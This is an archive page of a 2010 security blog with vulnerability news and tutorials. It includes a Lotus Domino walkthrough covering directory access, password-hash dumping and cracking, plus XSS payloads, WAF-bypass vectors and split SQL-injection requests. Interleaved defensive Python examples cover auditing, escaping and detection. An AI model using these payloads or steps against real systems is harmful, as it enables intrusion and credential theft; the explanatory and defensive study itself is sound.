Archive for category Vulnerabilities
Vulnerability Makes All Facebook Accounts Exposed
Posted by Mourad Ben Lakhoua in Social Networking, Vulnerabilities, Vulnerabilities & attacks on August 13, 2010
A new vulnerability has been discovered in Facebook that lets an attacker harvest information about any user of the social network: given only an email address, an attacker can retrieve the account holder's name and profile pictures.
The vulnerability works regardless of the account's privacy settings; even if your account is hidden from all search engines, this information can still be obtained.
The gathered information can be used for phishing attacks or other abuse.
According to the researchers, if someone has a list of email addresses about which he knows nothing, he can feed them to Facebook one by one (or in bulk, using a script like this) and will likely get more than 50% hits. This is useful for phishing attacks, because people are more easily convinced when they see their *real* names.
Alternatively, an attacker can randomly generate email addresses and build a database of users' names and pictures, which means you have no privacy: your information can easily be found.
Update :
Facebook, in a statement sent to SCMagazineUS.com on Thursday, said the glitch has been fixed.
“We have technical systems in place to prevent people’s names and profile photos from showing to unrelated users upon login, but a recently introduced bug temporarily prevented these from working as intended,” Facebook said in a statement. “We remedied the situation swiftly.”
make sure you subscribe to my RSS feed!
Microsoft to Fix 34 Vulnerabilities on Next Tuesday
Posted by Mourad Ben Lakhoua in Software Security, Vulnerabilities on August 6, 2010
The Microsoft Security Response Center has released an advance notification of new patches intended to fix 34 vulnerabilities. There will be 14 security bulletins; eight are rated critical and the other six important.
The critical vulnerabilities allow an attacker to perform remote code execution on the targeted system, so an attacker can gain complete control over the victim's machine. All of the patches require, or may require, a restart.
The affected products are all Windows operating systems, all Microsoft Office versions, and Silverlight 2 and 3; the latest version, Silverlight 4, is not affected.
For detecting and deploying these updates Microsoft advises using Windows Update (WU), Windows Server Update Services (WSUS), the Microsoft Windows Malicious Software Removal Tool and the Microsoft Download Center.
Microsoft Security Bulletin Advance Notification for August 2010 is available over here.
WPA2 Might Be Spoofed!
Posted by Mourad Ben Lakhoua in News, Privacy & data protection, Vulnerabilities, Vulnerabilities & attacks on July 26, 2010
WPA2 (Wi-Fi Protected Access 2) is the second version of a set of algorithms and protocols that protect data in wireless networks. WPA2 was expected to significantly improve the security of Wi-Fi networks compared with previous technologies: the standard mandates the stronger AES (Advanced Encryption Standard) encryption algorithm and 802.1X authentication.
A group of researchers has reported discovering a vulnerability in this protocol, which is widely used as the secure standard for wireless networks. AirTight Networks said the vulnerability affects networks that follow the IEEE 802.11 standard. The first demonstration of the vulnerability will be given at Defcon 18 this week in Las Vegas.
The vulnerability is named Hole 196 and uses a man-in-the-middle method of attack in which a user who is already authorized on the Wi-Fi network intercepts and decrypts data transmitted and received by others on the same wireless network. The exploit code is reported to be made publicly available so that everyone can test and use it, while vendors and standards bodies work on adjustments to WPA2.
Md Sohail Ahmad, who will demonstrate the attack at Defcon, says it took about 10 lines of code in the open source MadWiFi driver software, freely available on the Internet, plus an off-the-shelf client card for him to spoof the MAC address of the AP and pose as the gateway for outgoing traffic. Clients that receive the message see the client as the gateway and “respond with PTKs”, which are private and which the insider can decrypt.
We will be following this research closely, since all access points use this protocol and an update should be available before the demo to fix this vulnerability.
Hacking Lotus Domino
Posted by Mourad Ben Lakhoua in Password Security, Pentesting, Vulnerabilities on July 12, 2010
IBM Lotus Domino Server is a solution for the corporate environment that provides different services for managing electronic documents, and it includes many modules such as a mail server, an HTTP server and a database. The current version is Lotus Domino 8.5.1.
To detect the server we start by scanning the network. The server usually runs a web interface (Lotus Domino httpd), so we run Nmap against the target network as follows:
nmap -sV 172.16.1.0/24 -p 80
Nmap scan report for 172.16.1.7
Host is up (0.017s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
80 open http Lotus Domino httpd
As you can see, the IP address of the Domino server has been found, and you can open your web browser to check some Domino web pages, including the version: http://serverip/homepage.nsf.
You can use Google hacking to find all web servers running Domino by searching for inurl:homepage.nsf; the results contain thousands of Domino based web pages. It is very important to note that you should not attempt to train yourself on these sites.
Usually when you install the Lotus client you need to connect to the server as a user, and an authentication screen appears that terrifies inexperienced hackers; but if you concentrate and check everything slowly you will find the gaps and administrator faults.
First you start by learning the important resources on the server. On Domino the most important files have the .NSF extension, so we have:
/names.nsf: the Domino Directory, the file on the Domino server that contains file names and paths (the most important database in the Domino environment).
You can find other files using DominoHunter, which gives you a list of all .nsf files. But what we need is the names.nsf database, which includes all mail addresses, user information, users' operating systems, the security applications on Lotus Notes and other important information.
What is interesting is that on most Domino servers this file can be accessed by anonymous users =-).
Now, the kinds of information we need to take care of:
1. The list of user logins, so we can guess their passwords and also identify which user account is the admin.
2. All the information can be used in social engineering to trick untrained personnel.
3. In names.nsf you will also find the OS version and the Lotus Notes client version; this is very helpful for finding 0-days for all users, applications and OS. Here an attacker can even use a vulnerability in Internet Explorer to compromise some accounts.
Gathering information is not all that is possible: in 2005 someone discovered a vulnerability that allows an attacker to obtain Internet users' password hashes. The vulnerability is not difficult to exploit because all users' password hashes are stored in the hidden HTTPPassword or dspHTTPPassword field, depending on the version.
What is strange is that this vulnerability remains unfixed.
Now, the number of users can be in the hundreds or thousands, so you will need to collect all the hashes automatically. In 2007 an exploit for dumping password hashes, Raptor_dominohash, was released that allows downloading all users' hashes.
DominoHashBreaker is also an important tool; it tries to find the clear text form of the password using a dictionary attack. Its goal is to let an administrator check the robustness of the users' passwords.
But for the best results use John the Ripper with the Jumbo patch, which adds modern password hashes; all you need is to give HASH.txt to John the Ripper (in the form username:hash). If you recover one account's password you will know the password policy for all users, and it will not take much time to obtain the full password list. These passwords are for Domino web access.
If we have the administrator account's password, then it's OK; if not, we should repeat the previous steps. Interestingly, the admin password allows an attacker to open webadmin.nsf (servername/webadmin.nsf), the administration interface of the Lotus Domino web server, and by getting access to this resource you can add, remove or modify users.
Domino has another protocol, NRPC, using port 1352; it allows users to use the Lotus Notes client and Lotus Designer, and the client should have a certificate (a file with the .ID extension) to prove its identity. There is also a password authentication mechanism.
Passwords are used to decrypt the ID file, so to have access to any Domino account we need two things: an ID file and the password for that file. This is more complicated than web access, but it is always possible.
To get the ID file you can exploit a vulnerability in Lotus Domino where the server keeps a copy of the ID stored on the server; so if you have the user logins, as shown using names.nsf, you will have the ID. For the password there are three tools that can search for the ID password (ID Password Recovery, Lotus Notes Password Recovery or Notes Password Recovery), available by following this link; all three tools are free.
This post presents a clear picture of the different configuration faults that can exist in a Domino server, where a small vulnerability can allow an outsider to take full control of the server and manipulate a corporation's very sensitive information.
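The anonymous-readable names.nsf described above is a misconfiguration an administrator can check for on their own servers. The following is an added example written for this post, not code from the original article or from IBM: it picks Domino hosts out of nmap -sV output (the sample output is constructed, not a real scan) and classifies an unauthenticated response to /names.nsf, distinguishing HTTP authentication (401/403), Domino's form-based session login (a 200 carrying a password form) and a directory that is actually readable without credentials. The check_anonymous_access function performs a live request and is meant for servers you administer; the User-Agent string and status classification are assumptions of this example.

```python
# Added example, not from the original post or from IBM: an audit helper for a
# Domino server you administer. It (1) picks Domino hosts out of `nmap -sV`
# output and (2) classifies an unauthenticated response to /names.nsf so you
# can spot the anonymous-access misconfiguration the post describes.
import re
import urllib.error
import urllib.request

# Constructed sample of `nmap -sV -p 80 172.16.1.0/24` normal output (not real scan data).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 172.16.1.7
Host is up (0.017s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Lotus Domino httpd

Nmap scan report for 172.16.1.9
Host is up (0.012s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.14
"""

SCAN_REPORT_RE = re.compile(r"^Nmap scan report for (\S+)")
OPEN_PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+\S+\s+(.*)$")


def domino_hosts(nmap_output):
    """Return (host, port) pairs whose open port reports the Lotus Domino HTTP service."""
    found = []
    current = None
    for line in nmap_output.splitlines():
        m = SCAN_REPORT_RE.match(line)
        if m:
            current = m.group(1)
            continue
        m = OPEN_PORT_RE.match(line)
        if m and current and "Lotus Domino" in m.group(2):
            found.append((current, int(m.group(1))))
    return found


def classify_names_nsf(status, body=b""):
    """Classify the response an anonymous client gets for GET /names.nsf.

    401/403 mean the directory is protected by HTTP authentication or an ACL.
    A 200 is only a problem if it is the directory itself; Domino's session
    (form-based) authentication also answers 200 with a login form, so the
    body is checked for a password form before calling it readable.
    """
    if status in (401, 403):
        return "protected"
    if status == 200:
        text = body.decode("latin-1", "replace").lower()
        if "<form" in text and "password" in text:
            return "login-form"
        return "anonymous-readable"
    if status in (301, 302, 303, 307, 308):
        return "redirect"
    return "other-%d" % status


def check_anonymous_access(base_url, timeout=5):
    """Live check: fetch /names.nsf without credentials and classify the answer."""
    url = base_url.rstrip("/") + "/names.nsf"
    req = urllib.request.Request(url, headers={"User-Agent": "domino-audit-example/0.1"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify_names_nsf(resp.status, resp.read(8192))
    except urllib.error.HTTPError as err:
        return classify_names_nsf(err.code, b"")


def audit(nmap_output):
    """Combine both steps: every Domino host found is checked for anonymous names.nsf access."""
    return {host: check_anonymous_access("http://%s:%d" % (host, port))
            for host, port in domino_hosts(nmap_output)}


if __name__ == "__main__":
    for host, port in domino_hosts(SAMPLE_NMAP_OUTPUT):
        print("Domino host found:", host, port)
```

Run audit() against the real output of your own scan; a result of "anonymous-readable" for any host means the Domino Directory ACL grants Anonymous at least Reader access and should be reviewed.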
Reference: http://dsecrg.com/pages/pub/show.php?id=2
Cross-site scripting on YouTube
Posted by Mourad Ben Lakhoua in News, Vulnerabilities, Vulnerabilities & attacks, Web Security on July 4, 2010
An XSS vulnerability in YouTube's comment processing allows an attacker to execute arbitrary scripts in the security context of the site.
Go on youtube. Choose any video. Add the following script:
<script>IF_HTML_FUNCTION?<h1><marquee><font color="red"><u>add your comment here<script>
Update (1): It is better to stay away from YouTube until they fix the vulnerability, or at least to log out of YouTube if you use it.
Update (2): Google has informed that the vulnerability has now been fixed:
We took swift action to fix a cross-site scripting (XSS) vulnerability on youtube.com that was discovered several hours ago. Comments were temporarily hidden by default within an hour, and we released a complete fix for the issue in about two hours. We’re continuing to study the vulnerability to help prevent similar issues in the future.
You can find the statement here.
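The root cause of a comment XSS like the one above is user-supplied text being inserted into the page without HTML encoding. The following is an added example, not YouTube's code: it renders the comment from this post into a constructed HTML wrapper both the vulnerable way and the encoded way, and counts the tags that end up inside the comment container so the difference is measurable. The wrapper template and the tag regular expression are assumptions of this example.

```python
# Added example, not YouTube's code: the defensive side of a comment XSS.
# A comment body is untrusted data; it must be HTML-encoded when inserted into
# the page so that markup in the comment is displayed as text, not executed.
import re
from html import escape

# The comment from the post, embedded here as a constructed test input.
PAYLOAD = '<script>IF_HTML_FUNCTION?<h1><marquee><font color="red"><u>add your comment here<script>'

# Constructed wrapper the comment is rendered into.
TEMPLATE = '<div class="comment">{body}</div>'

TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")


def render_unsafe(comment):
    """Vulnerable rendering: the comment is pasted into the HTML as-is."""
    return TEMPLATE.format(body=comment)


def render_safe(comment):
    """Fixed rendering: &, <, >, " and ' are encoded before insertion."""
    return TEMPLATE.format(body=escape(comment, quote=True))


def injected_tags(html):
    """Tags found inside the comment container; anything here came from the comment."""
    inner = html[len('<div class="comment">'):-len("</div>")]
    return TAG_RE.findall(inner)


if __name__ == "__main__":
    print("unsafe:", injected_tags(render_unsafe(PAYLOAD)))
    print("safe:  ", injected_tags(render_safe(PAYLOAD)))
```

Encoding on output is the fix that applies regardless of what the comment contains; stripping specific tags (a blacklist) is what filters like the one bypassed here tend to rely on.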
Mozilla Fixes 9 vulnerabilities & adds a Crash Protection to Firefox
Posted by Mourad Ben Lakhoua in Vulnerabilities, Vulnerabilities & attacks, Web Security on June 24, 2010
A new release has been issued by Mozilla. Firefox 3.6.4 is the first open source web browser that integrates plugin functionality in the main process of the browser. This release is intended to decrease the number of Firefox crashes.
As usual you can find two versions for both Linux and Windows operating systems.
Mike Beltzner wrote on the company's blog that during beta testing the new feature significantly reduced the number of freezes users face while watching online videos or playing online games. This release also protects users against failures of plugins such as Adobe Flash, Apple QuickTime and Microsoft Silverlight.
All these features come together with fixes for 9 vulnerabilities; six are critical and allow an attacker to compromise the system and run malicious software on the machine.
It is time to upgrade your browser and check whether you have missed any update.
Detecting & Bypassing Web Application Firewalls (part 2)
Posted by Mourad Ben Lakhoua in Vulnerabilities, Vulnerabilities & attacks, Web Security on May 30, 2010
There is no single ideal system in the world, and this applies to web application firewalls (WAFs) too.
While the advantages and positive features of WAFs far outweigh the negatives, one major problem is that only a few action rules are allowed. The whitelist keeps expanding and requires more development effort, because it is very important to clearly establish the allowed parameters.
The second major problem is that WAF vendors sometimes fail to update their signature definitions, or do not develop the required security rule in time, and this can put the web server at risk of attack.
The first vulnerability is CVE-2009-1593 (http://www.security-database.com/detail.php?alert=CVE-2009-1593), which allows inserting extra characters in the JavaScript closing tag to bypass the XSS protection mechanism. An example is shown below: http://testcases/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3
Another example, CVE-2009-1594 (http://www.security-database.com/detail.php?alert=CVE-2009-1594), also allows remote attackers to bypass certain protection mechanisms via a %0A (encoded newline), as demonstrated by a %0A in a cross-site scripting (XSS) attack URL.
HTTP Parameter Pollution (HPP)
HPP was first described by two Italian security researchers, Luca Carettoni and Stefano di Paola. HPP gives an attacker the ability to submit multiple HTTP parameters (POST, GET) with the same name across different inputs (query string, POST data, cookies, etc.).
The application may react in unexpected ways and open up new avenues of server-side and client-side exploitation. The most notable example is a vulnerability in IIS + ModSecurity which allows SQL injection attacks based on two behaviours:
1. IIS joins HTTP parameters submitted with the same name. For example:
POST /index.aspx?a=1&a=2 HTTP/1.0
Host: www.example.com
Cookie: a=5;a=6
Content-type: text/plain
Content-Length: 7
Connection: close
a=3&a=4
If such a request is sent to IIS/ASP.NET, the parameter a (Request.Params["a"]) equals 1,2,3,4,5,6.
2. ModSecurity analyzes the request separately from how the web server later processes it, and rejects an obvious injection such as: http://testcases/index.aspx?id=1+UNION+SELECT+username,password+FROM+users
However, the following split request passes:
POST /index.aspx?a=-1%20union/*&a=*/select/* HTTP/1.0
Host: www.example.com
Cookie: a=*/from/*;a=*/users
Content-Length: 21
a=*/name&a=password/*
As a result the database executes the assembled query:
SELECT b, c FROM t WHERE a=-1 /*,*/ UNION /*,*/ SELECT /*,*/ name, password /*,*/ FROM /*,*/ users
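The detection-side lesson of the HPP case is that a filter must inspect the value the application will actually use, not each occurrence on its own. The following is an added example written for this post, not code from the original article, from IIS or from ModSecurity: it reconstructs the value ASP.NET's Request.Params["a"] produces from the three requests above (query string, then form body, then cookies, joined with commas), and runs a simple UNION/SELECT signature both per occurrence and on the joined value. The signature, the comment stripping and the sample requests (copied from the post) are assumptions of this example.

```python
# Added example, not from the original post, IIS or ModSecurity: reconstruct the
# value ASP.NET's Request.Params["a"] produces, and show why a filter that
# inspects each occurrence separately misses the split injection while a filter
# that inspects the joined value catches it.
import re
from urllib.parse import parse_qsl


def cookie_pairs(cookie_header):
    """Split a Cookie header ('a=1; a=2') into (name, value) pairs."""
    pairs = []
    for part in cookie_header.split(";"):
        part = part.strip()
        if "=" in part:
            name, value = part.split("=", 1)
            pairs.append((name, value))
    return pairs


def all_occurrences(query, body, cookie):
    """Every (name, value) occurrence in Request.Params order: query string, form body, cookies."""
    return (parse_qsl(query, keep_blank_values=True)
            + parse_qsl(body, keep_blank_values=True)
            + cookie_pairs(cookie))


def asp_params(query, body, cookie):
    """Join duplicate names with commas, as ASP.NET's Request.Params does."""
    joined = {}
    for name, value in all_occurrences(query, body, cookie):
        joined.setdefault(name, []).append(value)
    return {name: ",".join(values) for name, values in joined.items()}


# Deliberately simple signature: a UNION keyword followed by a SELECT keyword.
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)


def strip_sql_comments(text):
    """Remove complete /* ... */ comments, as the database parser does."""
    return re.sub(r"/\*.*?\*/", " ", text, flags=re.DOTALL)


def per_occurrence_hit(query, body, cookie):
    """Naive inspection: each value is checked in isolation, so an unterminated /* hides the keyword context."""
    return any(SQLI_RE.search(strip_sql_comments(v)) for _, v in all_occurrences(query, body, cookie))


def joined_hit(query, body, cookie):
    """Inspection of the value the application will actually use."""
    return any(SQLI_RE.search(strip_sql_comments(v)) for v in asp_params(query, body, cookie).values())


# The two requests from the post, constructed here as (query, body, cookie) strings.
PLAIN_ATTACK = ("id=1+UNION+SELECT+username,password+FROM+users", "", "")
SPLIT_ATTACK = ("a=-1%20union/*&a=*/select/*", "a=*/name&a=password/*", "a=*/from/*;a=*/users")

if __name__ == "__main__":
    print("joined a =", asp_params(*SPLIT_ATTACK)["a"])
    print("per-occurrence:", per_occurrence_hit(*SPLIT_ATTACK), " joined:", joined_hit(*SPLIT_ATTACK))
```

The joining order matters: a WAF that normalises duplicates in a different order than the application (or drops them) still disagrees with the backend, which is the general shape of every HPP bypass.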
XSS
Cross Site Scripting (XSS) is probably the best method for bypassing a web application firewall (WAF), because of JavaScript's flexibility. At the BlackHat conference a large number of methods to trick filters were presented. For example:
<object data="javascript:alert(0)">
<isindex action=javascript:alert(1) type=image>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert('xss');</x:script>
More XSS information can be found on the following links:
– http://ha.ckers.org/xss.html
– http://sla.ckers.org/forum/list.php?24
– http://maliciousmarkup.blogspot.com/
New developments in web application firewalls are forthcoming. Sometimes it seems that everything has already been discovered and that it makes no sense to search for something new, but there is always room for new research.
It is very important to look at all details of the WAF to ensure you have a clear vision of your security assets.
Detecting & Bypassing Web Application Firewalls (part 1)
Posted by Mourad Ben Lakhoua in Vulnerabilities, Vulnerabilities & attacks, Web Security on May 23, 2010
When we hear the term firewall, most of us think of the network filtering solution. But have you heard about the web application firewall (WAF)?
Web applications have some serious vulnerabilities, and a WAF provides a very important extra protection layer for the web solution. Hackers can find entry points through errors in code, so having a WAF in front of the web application is very important for security.
A WAF acts as a special mechanism governing the interaction between server and client while processing HTTP packets, and it provides a way to monitor the data as it is received from outside. The solution is based on a set of rules that expose an attack targeting the server. Usually a web application firewall aims to protect large websites such as banks, online retailers, social networks and large companies, but now anyone can use one, since open-source solutions are available.
WAF can be implemented in two ways, via hardware or software, and in three forms:
1. Implemented as a reverse proxy server.
2. Implemented in routing mode / bridge.
3. Integrated in the Web application.
Examples of the first form are mod_security, Barracuda and nevisProxy. These types of WAF automatically block or redirect the request to the web server without changing or editing the data.
The second category consists mainly of hardware WAFs, for example Imperva SecureSphere (impervaguard.com). These solutions require additional configuration on the internal network, but in return the option gains in performance.
Finally, the third type lives inside the web application itself, for example a WAF integrated in the CMS.
WAF rules contain a blacklist (compared against a list of unacceptable actions) and a whitelist (accepted and permitted actions). For example, the blacklist may contain strings like «UNION SELECT», «<script>» and «/etc/passwd», while whitelist rules may specify the range of a numeric parameter value (from 0 to 65535).
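The difference between the two rule types is easiest to see with both applied to the same inputs. The following is an added example written for this post, not code from the original article or from any WAF product: a minimal rule engine whose blacklist is the three strings named above and whose whitelist is a per-parameter positive model, including the 0 to 65535 range for a numeric parameter. The parameter names, patterns and sample values are assumptions of this example.

```python
# Added example, not from the original post or from any WAF product: a minimal
# rule engine with the two rule types described above. The blacklist is a set of
# forbidden substrings (negative model); the whitelist is a positive model per
# known parameter. Parameter names and sample values are constructed.
import re
from urllib.parse import unquote_plus

# Blacklist strings from the text.
BLACKLIST = ("UNION SELECT", "<script>", "/etc/passwd")

# Whitelist: an allowed syntax for each parameter the application actually uses.
WHITELIST = {
    "id": re.compile(r"^[0-9]{1,5}$"),      # digits only; the range check is below
    "page": re.compile(r"^[a-z_]{1,32}$"),  # a plain page name
}
ID_RANGE = (0, 65535)


def blacklist_verdict(value):
    """Block if any forbidden string appears in the decoded value."""
    decoded = unquote_plus(value)
    return "block" if any(bad in decoded for bad in BLACKLIST) else "allow"


def whitelist_verdict(name, value):
    """Allow only values that match the positive model for that parameter."""
    pattern = WHITELIST.get(name)
    if pattern is None:
        return "block"  # unknown parameter: nothing permits it
    decoded = unquote_plus(value)
    if not pattern.match(decoded):
        return "block"
    if name == "id" and not ID_RANGE[0] <= int(decoded) <= ID_RANGE[1]:
        return "block"  # syntactically a number, but outside the allowed range
    return "allow"


def evaluate(name, value):
    """Verdict of each rule type for one parameter, side by side."""
    return {"blacklist": blacklist_verdict(value), "whitelist": whitelist_verdict(name, value)}


# Constructed requests: a legitimate value, the textbook attack string, and two
# variants that differ from the blacklist entry only in case, comments or encoding.
SAMPLES = [
    ("id", "42"),
    ("id", "1 UNION SELECT a,b FROM t"),
    ("id", "1 union/**/select a from t"),
    ("id", "70000"),
    ("page", "%3Cscript%3Ealert(1)%3C/script%3E"),
    ("page", "<ScRiPt>alert(1)</ScRiPt>"),
]

if __name__ == "__main__":
    for name, value in SAMPLES:
        print(name, repr(value), evaluate(name, value))
```

The whitelist rejects every variant because it never had to anticipate them, which is the argument the text makes for it; its cost is the development effort of specifying every allowed parameter, which is why real deployments combine both.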
We will now look at how a pentester can detect the WAF, and more importantly how to bypass it.
Each firewall has a particular way of responding that helps in identifying the type of WAF implemented (fingerprinting), for example:
• Cookie parameters in the HTTP response.
• Modified HTTP headers that mask the server.
• The way it responds to special data and queries.
• The way it closes the connection on unauthorized actions.
For example, when we launch an attack on mod_security we get a 501 error code; WebKnight returns the code 999; Barracuda sets the cookie parameter barra_counter_session.
This certainly helps in identifying the WAF, and some scanners can automate the operation, such as the w3af framework plugin WAF_fingerprint and wafw00f. These tools are important for the pentesting operation.
The next part will look at different techniques to bypass web application firewalls and exploit the most popular vulnerabilities.
New Method for Hacking Mobile Networks can Expose Users Sensitive Info
Posted by Mourad Ben Lakhoua in Network security, News, Vulnerabilities, Vulnerabilities & attacks on April 22, 2010
At the Source Conference in Boston, new vulnerabilities in the GSM mobile network were demonstrated by Carmen San Diego, Don Bailey, iSec Partners and Nick DePetrillo that allow a person to track any mobile phone across the world.
The demo showed how it is possible to determine a user's specific location and obtain further details without even knowing the phone number, which was considered impossible.
The idea of the attack is to exploit a vulnerability in the mobile network database to obtain users' names and phone numbers. All the attacker needs is caller ID to build a kind of phone directory covering any mobile phone number. In the demo the researchers created an account with a VoIP caller ID function and placed calls to it frequently, using a huge range of fake numbers from an Asterisk server.
The information gathered in response allowed the experts to obtain subscribers' names and phone numbers, and they were able to identify number ranges belonging to private companies and government agencies.
It is very important to note that the vulnerabilities concern many popular computing platforms including Mac OS X, Linux, FreeBSD and OpenBSD. The presentation Locating Mobile Phones using SS7 can be found here.
Network Device Vulnerability Allows a Remote Access
Posted by Mourad Ben Lakhoua in News, Vulnerabilities, Vulnerabilities & attacks on March 28, 2010
At the annual international conference CanSecWest in Vancouver, members of ANSSI (the French Network and Information Security Agency) demonstrated how an intruder can gain complete control over a system remotely.
The speakers explained how an attacker may use a certain vulnerability in network devices to execute arbitrary commands on the victim machine. The presentation is called “Can you still trust your network card?”. The attack uses packets sent to the victim's network device and enables the attacker to conduct a man-in-the-middle attack, access the host's cryptographic keys, and execute a malicious program on the victim's computer.
The presentation included a full description of the vulnerability, as well as a demo of the attack, while the tool used for conducting the attack and the proof of concept exploit remain unpublished.
Here you can find the presentation: http://www.ssi.gouv.fr/site_article186.html
The attack is possible on certain network device models (Broadcom NetXtreme) under a certain condition (the Alert Standard Format 2.0 remote control being enabled), which is disabled by default. According to the manufacturer an update has been released to patch this vulnerability.